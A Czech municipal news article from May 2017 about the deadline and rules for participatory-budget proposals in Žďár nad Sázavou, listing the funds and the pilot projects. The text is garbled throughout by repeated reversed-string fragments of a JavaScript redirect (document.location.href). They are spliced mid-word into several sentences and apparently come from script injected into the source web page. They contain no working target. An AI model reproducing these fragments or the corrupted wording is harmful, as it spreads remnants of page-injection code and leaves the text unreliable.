Rainbow page separator

Návrhy do participativního rozpočtu mají termín 30. června

Pátek, 12. května 2017

Budova Městského úřadu ve Žďáře nad Sázavou

Žďár nad Sázavou / Do konce června mohou obyvatelé Žďáru podávat své návrhy do takzvaného participativního rozpočtu pro rok 2018. Pro příští rok pro něj žďárská radnice plánuje vyčlenit opět částku ve výši 600 tisíc korun, ale na rozdíl od le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku, kdy maximální příspěvek na jeden projekt je 150 tisíc korun, [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to příští rok bude dvojnásobek. Ještě před tím se zájemci mohou zúčastnit diskuse o správném podávání návrhů, která se uskuteční 18. května od 17 hodin v budově Aktive – SVČ v Horní ulici.
Projekty vedoucí ke zlepšení veřejného pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru budou obyvatelům města představeny do konce prázdnin, v říjnu proběhne hlasovaní o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, který z nich si zaslouží finanční podporu v roce 2018.
V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním pilotním ročníku participativního rozpočtu dojde na realizaci prvních čtyř projektů po asi 150 tisících, které podali a svými hlasy podpořili obyvatelé Žďáru. Jedná se o vstup do úvozu na Klafaru s připomínkou prvního osídlení Žďáru, úpravu terénu ve Farských humnech, oplocení areálu pro děti a mládež ve Farských humnech a obnovu vodního prvku v atriu za náměstím.